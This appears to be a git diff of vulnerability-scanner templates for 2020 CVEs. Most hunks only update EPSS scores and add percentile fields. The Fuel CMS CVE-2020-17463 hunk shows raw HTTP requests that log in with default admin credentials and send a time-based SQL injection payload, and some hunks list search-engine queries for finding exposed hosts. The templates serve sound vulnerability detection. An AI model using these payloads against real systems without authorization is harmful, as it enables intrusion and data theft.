cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*
+ epss-percentile: 0.73814
metadata:
max-request: 1
vendor: traefik
diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml
index 662423edcb..dd228c254b 100644
--- a/http/cves/2020/CVE-2020-15148.yaml
+++ b/http/cves/2020/CVE-2020-15148.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 10
cve-id: CVE-2020-15148
cwe-id: CWE-502
- epss-score: 0.01814
+ epss-score: 0.02226
cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88079
metadata:
max-request: 1
vendor: yiiframework
diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml
index a07bef6112..576108a873 100644
--- a/http/cves/2020/CVE-2020-15227.yaml
+++ b/http/cves/2020/CVE-2020-15227.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-15227
cwe-id: CWE-94,CWE-74
- epss-score: 0.9741
+ epss-score: 0.97364
cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99844
metadata:
max-request: 1
vendor: nette
diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml
index c719b21439..383d2812b3 100644
--- a/http/cves/2020/CVE-2020-15500.yaml
+++ b/http/cves/2020/CVE-2020-15500.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0021
cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58204
metadata:
max-request: 1
vendor: tileserver
diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml
index 2865bc404e..cbe78c71d5 100644
--- a/http/cves/2020/CVE-2020-15505.yaml
+++ b/http/cves/2020/CVE-2020-15505.yaml
@@ -22,6 +22,7 @@ info:
cwe-id: CWE-706
epss-score: 0.97504
cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99964
metadata:
max-request: 1
vendor: mobileiron
diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml
index 345329b65a..4179598619 100644
--- a/http/cves/2020/CVE-2020-15568.yaml
+++ b/http/cves/2020/CVE-2020-15568.yaml
@@ -16,12 +16,12 @@ info:
cwe-id: CWE-913
epss-score: 0.96537
cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99422
metadata:
max-request: 2
vendor: terra-master
product: tos
tags: cve,cve2020,terramaster,rce
-
variables:
filename: "{{to_lower(rand_text_alpha(4))}}"
diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml
index 1c0e2c2499..7c7a15a98b 100644
--- a/http/cves/2020/CVE-2020-15867.yaml
+++ b/http/cves/2020/CVE-2020-15867.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-15867
- epss-score: 0.96555
+ epss-score: 0.96465
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99385
metadata:
max-request: 7
verified: true
diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml
index c412810275..31e66e2548 100644
--- a/http/cves/2020/CVE-2020-15895.yaml
+++ b/http/cves/2020/CVE-2020-15895.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00187
cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:*
+ epss-percentile: 0.55288
metadata:
max-request: 1
shodan-query: html:"DIR-816L"
diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml
index 59abbb89ec..853730a203 100644
--- a/http/cves/2020/CVE-2020-15920.yaml
+++ b/http/cves/2020/CVE-2020-15920.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-15920
cwe-id: CWE-78
- epss-score: 0.97241
+ epss-score: 0.97263
cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9977
metadata:
max-request: 1
vendor: midasolutions
diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml
index 8f3c8cfc12..7465dea796 100644
--- a/http/cves/2020/CVE-2020-16139.yaml
+++ b/http/cves/2020/CVE-2020-16139.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2020-16139
epss-score: 0.01181
cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83291
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml
index 05c16351cc..85411d171f 100644
--- a/http/cves/2020/CVE-2020-16846.yaml
+++ b/http/cves/2020/CVE-2020-16846.yaml
@@ -17,14 +17,14 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-16846
cwe-id: CWE-78
- epss-score: 0.97541
+ epss-score: 0.97514
cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99971
metadata:
max-request: 1
vendor: saltstack
product: salt
tags: vulhub,cve,cve2020,saltstack,kev
-
variables:
priv: "{{to_lower(rand_text_alpha(5))}}"
roaster: "{{to_lower(rand_text_alpha(6))}}"
diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml
index 3d0e4fc201..6e6a57db01 100644
--- a/http/cves/2020/CVE-2020-16952.yaml
+++ b/http/cves/2020/CVE-2020-16952.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.8
cve-id: CVE-2020-16952
cwe-id: CWE-346
- epss-score: 0.16299
+ epss-score: 0.19008
cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*
+ epss-percentile: 0.95588
metadata:
max-request: 1
vendor: microsoft
diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml
index 563e80c21c..c4b22882a0 100644
--- a/http/cves/2020/CVE-2020-17362.yaml
+++ b/http/cves/2020/CVE-2020-17362.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00101
cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40822
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml
index c09328ccfc..76b8c3e30f 100644
--- a/http/cves/2020/CVE-2020-17453.yaml
+++ b/http/cves/2020/CVE-2020-17453.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.01736
cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86329
metadata:
max-request: 1
vendor: wso2
diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml
index 7d0f42657b..b81850f0a4 100644
--- a/http/cves/2020/CVE-2020-17456.yaml
+++ b/http/cves/2020/CVE-2020-17456.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97265
cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99771
metadata:
max-request: 2
vendor: seowonintech
diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml
index f74e18f64c..117d5b9929 100644
--- a/http/cves/2020/CVE-2020-17463.yaml
+++ b/http/cves/2020/CVE-2020-17463.yaml
@@ -3,33 +3,37 @@ id: CVE-2020-17463
info:
name: Fuel CMS 1.4.7 - SQL Injection
author: Thirukrishnan
- severity: high
+ severity: critical
description: |
FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
- remediation: Fixed in version 115
reference:
- https://www.exploit-db.com/exploits/48741
- https://nvd.nist.gov/vuln/detail/CVE-2020-17463
- http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html
- https://getfuelcms.com/
+ - https://cwe.mitre.org/data/definitions/89.html
+ remediation: Fixed in version 115
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-17463
cwe-id: CWE-89
+ epss-score: 0.8963
cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*
+ epss-percentile: 0.98341
metadata:
max-request: 3
verified: true
shodan-query: http.title:"fuel cms"
- tags: cve,cve2020,sqli,fuel-cms,kev
+ vendor: thedaylightstudio
+ product: fuel_cms
+ tags: packetstorm,cve,cve2020,sqli,fuel-cms,kev
http:
- raw:
- |
GET /fuel/login/ HTTP/1.1
Host: {{Hostname}}
-
- |
POST /fuel/login/ HTTP/1.1
Host: {{Hostname}}
@@ -37,7 +41,6 @@ http:
Referer: {{RootURL}}
user_name={{username}}&password={{password}}&Login=Login&forward=
-
- |
@timeout: 10s
GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
@@ -51,7 +54,6 @@ http:
password:
- admin
attack: pitchfork
-
cookie-reuse: true
matchers:
- type: dsl
diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml
index 85f29f017d..37cdb8796d 100644
--- a/http/cves/2020/CVE-2020-17496.yaml
+++ b/http/cves/2020/CVE-2020-17496.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-17496
cwe-id: CWE-74
- epss-score: 0.97513
+ epss-score: 0.97475
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99945
metadata:
max-request: 1
vendor: vbulletin
diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml
index 0fc619a4d1..4ece0aeb70 100644
--- a/http/cves/2020/CVE-2020-17505.yaml
+++ b/http/cves/2020/CVE-2020-17505.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-78
epss-score: 0.96863
cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*
+ epss-percentile: 0.99563
metadata:
max-request: 2
vendor: articatech
diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml
index 67aa99a35b..597e9d806e 100644
--- a/http/cves/2020/CVE-2020-17506.yaml
+++ b/http/cves/2020/CVE-2020-17506.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-17506
cwe-id: CWE-89
- epss-score: 0.96186
+ epss-score: 0.96091
cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*
+ epss-percentile: 0.9927
metadata:
max-request: 1
vendor: articatech
diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml
index 1e802257f5..12c36cbfeb 100644
--- a/http/cves/2020/CVE-2020-17518.yaml
+++ b/http/cves/2020/CVE-2020-17518.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-17518
cwe-id: CWE-22,CWE-23
- epss-score: 0.97469
+ epss-score: 0.97465
cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99936
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml
index 1fd45c10fb..00c456afc2 100644
--- a/http/cves/2020/CVE-2020-17519.yaml
+++ b/http/cves/2020/CVE-2020-17519.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-17519
cwe-id: CWE-552
- epss-score: 0.97434
+ epss-score: 0.97432
cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99903
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml
index 83271c2100..be2b4d597d 100644
--- a/http/cves/2020/CVE-2020-17526.yaml
+++ b/http/cves/2020/CVE-2020-17526.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 7.7
cve-id: CVE-2020-17526
cwe-id: CWE-287
- epss-score: 0.03799
+ epss-score: 0.03274
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.90012
metadata:
max-request: 2
fofa-query: Apache Airflow
diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml
index 537683e9c5..b9e9a53fbc 100644
--- a/http/cves/2020/CVE-2020-17530.yaml
+++ b/http/cves/2020/CVE-2020-17530.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-17530
cwe-id: CWE-917
- epss-score: 0.971
+ epss-score: 0.97161
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99704
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml
index d1d10e58fb..a9295432b9 100644
--- a/http/cves/2020/CVE-2020-18268.yaml
+++ b/http/cves/2020/CVE-2020-18268.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00138
cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:*
+ epss-percentile: 0.48623
metadata:
max-request: 2
vendor: zblogcn
diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml
index d80fd6e69d..f2d29583ee 100644
--- a/http/cves/2020/CVE-2020-19282.yaml
+++ b/http/cves/2020/CVE-2020-19282.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*
+ epss-percentile: 0.47974
metadata:
max-request: 1
vendor: jeesns
diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml
index a0918ee82b..fc9e139808 100644
--- a/http/cves/2020/CVE-2020-19283.yaml
+++ b/http/cves/2020/CVE-2020-19283.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*
+ epss-percentile: 0.47974
metadata:
max-request: 1
vendor: jeesns
diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml
index 94688af0fb..5b38c8c898 100644
--- a/http/cves/2020/CVE-2020-19295.yaml
+++ b/http/cves/2020/CVE-2020-19295.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*
+ epss-percentile: 0.44609
metadata:
max-request: 1
fofa-query: title="Jeesns"
@@ -45,4 +46,4 @@ http:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml
index ea54afe274..ee45e0af97 100644
--- a/http/cves/2020/CVE-2020-19360.yaml
+++ b/http/cves/2020/CVE-2020-19360.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-19360
cwe-id: CWE-22
- epss-score: 0.08443
+ epss-score: 0.08829
cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:*
+ epss-percentile: 0.93744
metadata:
max-request: 1
vendor: fhem
diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml
index 20fafdd20d..f6b89f585d 100644
--- a/http/cves/2020/CVE-2020-1943.yaml
+++ b/http/cves/2020/CVE-2020-1943.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.9737
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99851
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml
index e81e531373..236c3743b2 100644
--- a/http/cves/2020/CVE-2020-19515.yaml
+++ b/http/cves/2020/CVE-2020-19515.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
+ epss-percentile: 0.40864
metadata:
max-request: 1
shodan-query: http.favicon.hash:762074255
diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml
index c1fae974e4..0aae32afc9 100644
--- a/http/cves/2020/CVE-2020-1956.yaml
+++ b/http/cves/2020/CVE-2020-1956.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97423
cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99894
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml
index 61d67b1613..ed04e3f00b 100644
--- a/http/cves/2020/CVE-2020-19625.yaml
+++ b/http/cves/2020/CVE-2020-19625.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2020-19625
epss-score: 0.88684
cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:*
+ epss-percentile: 0.98276
metadata:
max-request: 1
vendor: gridx_project
diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml
index 523d314086..ef8b1d207f 100644
--- a/http/cves/2020/CVE-2020-20285.yaml
+++ b/http/cves/2020/CVE-2020-20285.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0009
cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:*
+ epss-percentile: 0.37386
metadata:
max-request: 1
fofa-query: zzcms
diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml
index 2155967033..c48904fecb 100644
--- a/http/cves/2020/CVE-2020-20300.yaml
+++ b/http/cves/2020/CVE-2020-20300.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-20300
cwe-id: CWE-89
- epss-score: 0.26416
+ epss-score: 0.218
cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.95816
metadata:
max-request: 1
shodan-query: http.html:"WeiPHP5.0"
diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml
index a9e00a1871..9e3e8df5b0 100644
--- a/http/cves/2020/CVE-2020-2036.yaml
+++ b/http/cves/2020/CVE-2020-2036.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-2036
cwe-id: CWE-79
- epss-score: 0.0109
+ epss-score: 0.00951
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
+ epss-percentile: 0.81231
metadata:
max-request: 2
vendor: paloaltonetworks
diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml
index 7735a620c9..1e9d4ddcd3 100644
--- a/http/cves/2020/CVE-2020-2096.yaml
+++ b/http/cves/2020/CVE-2020-2096.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.96767
cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:*
+ epss-percentile: 0.9952
metadata:
max-request: 1
shodan-query: http.title:"GitLab"
diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml
index 2a5a53c87f..32c5eda2cb 100644
--- a/http/cves/2020/CVE-2020-20982.yaml
+++ b/http/cves/2020/CVE-2020-20982.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 9.6
cve-id: CVE-2020-20982
cwe-id: CWE-79
- epss-score: 0.03503
+ epss-score: 0.01894
cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:*
+ epss-percentile: 0.87011
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml
index b3a3d7e1b8..cc4f588d1d 100644
--- a/http/cves/2020/CVE-2020-20988.yaml
+++ b/http/cves/2020/CVE-2020-20988.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0009
cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:*
+ epss-percentile: 0.37386
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml
index f82503a729..59cef02474 100644
--- a/http/cves/2020/CVE-2020-21012.yaml
+++ b/http/cves/2020/CVE-2020-21012.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-21012
cwe-id: CWE-89
- epss-score: 0.10567
+ epss-score: 0.07545
cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.93277
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml
index 7a2ae707b1..aecdea7bd5 100644
--- a/http/cves/2020/CVE-2020-2103.yaml
+++ b/http/cves/2020/CVE-2020-2103.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-200
epss-score: 0.00534
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
+ epss-percentile: 0.74191
metadata:
max-request: 2
shodan-query: http.favicon.hash:81586312
diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml
index 14905869fb..e7c35160ec 100644
--- a/http/cves/2020/CVE-2020-21224.yaml
+++ b/http/cves/2020/CVE-2020-21224.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-21224
cwe-id: CWE-88
- epss-score: 0.03
+ epss-score: 0.03105
cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:*
+ epss-percentile: 0.89779
metadata:
max-request: 1
vendor: inspur
diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml
index 2c3fad490f..9900f50db9 100644
--- a/http/cves/2020/CVE-2020-2140.yaml
+++ b/http/cves/2020/CVE-2020-2140.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-2140
cwe-id: CWE-79
- epss-score: 0.00208
+ epss-score: 0.00181
cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:*
+ epss-percentile: 0.54659
metadata:
max-request: 2
framework: jenkins
diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml
index 512a4ab04f..e77c32ab70 100644
--- a/http/cves/2020/CVE-2020-22208.yaml
+++ b/http/cves/2020/CVE-2020-22208.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-89
epss-score: 0.10555
cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94277
metadata:
max-request: 1
fofa-query: app="74cms"
diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml
index 6e20c473fa..d3b7395cc9 100644
--- a/http/cves/2020/CVE-2020-22209.yaml
+++ b/http/cves/2020/CVE-2020-22209.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-89
epss-score: 0.10555
cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94277
metadata:
max-request: 1
fofa-query: app="74cms"
diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml
index 4a847b0444..2ed80a6fa5 100644
--- a/http/cves/2020/CVE-2020-22210.yaml
+++ b/http/cves/2020/CVE-2020-22210.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-89
epss-score: 0.10555
cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94277
metadata:
max-request: 1
fofa-query: app="74cms"
diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml
index 6900bf5e8f..6cc741bf73 100644
--- a/http/cves/2020/CVE-2020-22211.yaml
+++ b/http/cves/2020/CVE-2020-22211.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-89
epss-score: 0.10555
cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94277
metadata:
max-request: 1
fofa-query: app="74cms"
diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml
index 6f01ab0006..7cf44b81d8 100644
--- a/http/cves/2020/CVE-2020-22840.yaml
+++ b/http/cves/2020/CVE-2020-22840.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.01174
cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83233
metadata:
max-request: 1
vendor: b2evolution
diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml
index d6a269c18b..919535e15f 100644
--- a/http/cves/2020/CVE-2020-23015.yaml
+++ b/http/cves/2020/CVE-2020-23015.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00228
cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
+ epss-percentile: 0.60346
metadata:
max-request: 1
vendor: opnsense
diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml
index d1d3e3a122..6705d1f51b 100644
--- a/http/cves/2020/CVE-2020-23517.yaml
+++ b/http/cves/2020/CVE-2020-23517.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00118
cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.45089
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml
index 5e0a65693e..4b672bdab4 100644
--- a/http/cves/2020/CVE-2020-23575.yaml
+++ b/http/cves/2020/CVE-2020-23575.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01879
cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.86948
metadata:
max-request: 1
vendor: kyocera
diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml
index 01d7972e96..c9c01bbe18 100644
--- a/http/cves/2020/CVE-2020-23697.yaml
+++ b/http/cves/2020/CVE-2020-23697.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0009
cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:*
+ epss-percentile: 0.37386
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml
index 6750707cde..09416ea52d 100644
--- a/http/cves/2020/CVE-2020-23972.yaml
+++ b/http/cves/2020/CVE-2020-23972.yaml
@@ -17,15 +17,15 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-23972
cwe-id: CWE-434
- epss-score: 0.68335
+ epss-score: 0.59376
cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
+ epss-percentile: 0.9731
metadata:
max-request: 2
framework: joomla\!
vendor: gmapfp
product: gmapfp
tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive
-
variables:
name: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml
index 29ace0f6d3..08f2785822 100644
--- a/http/cves/2020/CVE-2020-24148.yaml
+++ b/http/cves/2020/CVE-2020-24148.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2020-24148
cwe-id: CWE-918
- epss-score: 0.06154
+ epss-score: 0.06584
cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92859
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml
index 0da13314fd..70bd6f7df8 100644
--- a/http/cves/2020/CVE-2020-24186.yaml
+++ b/http/cves/2020/CVE-2020-24186.yaml
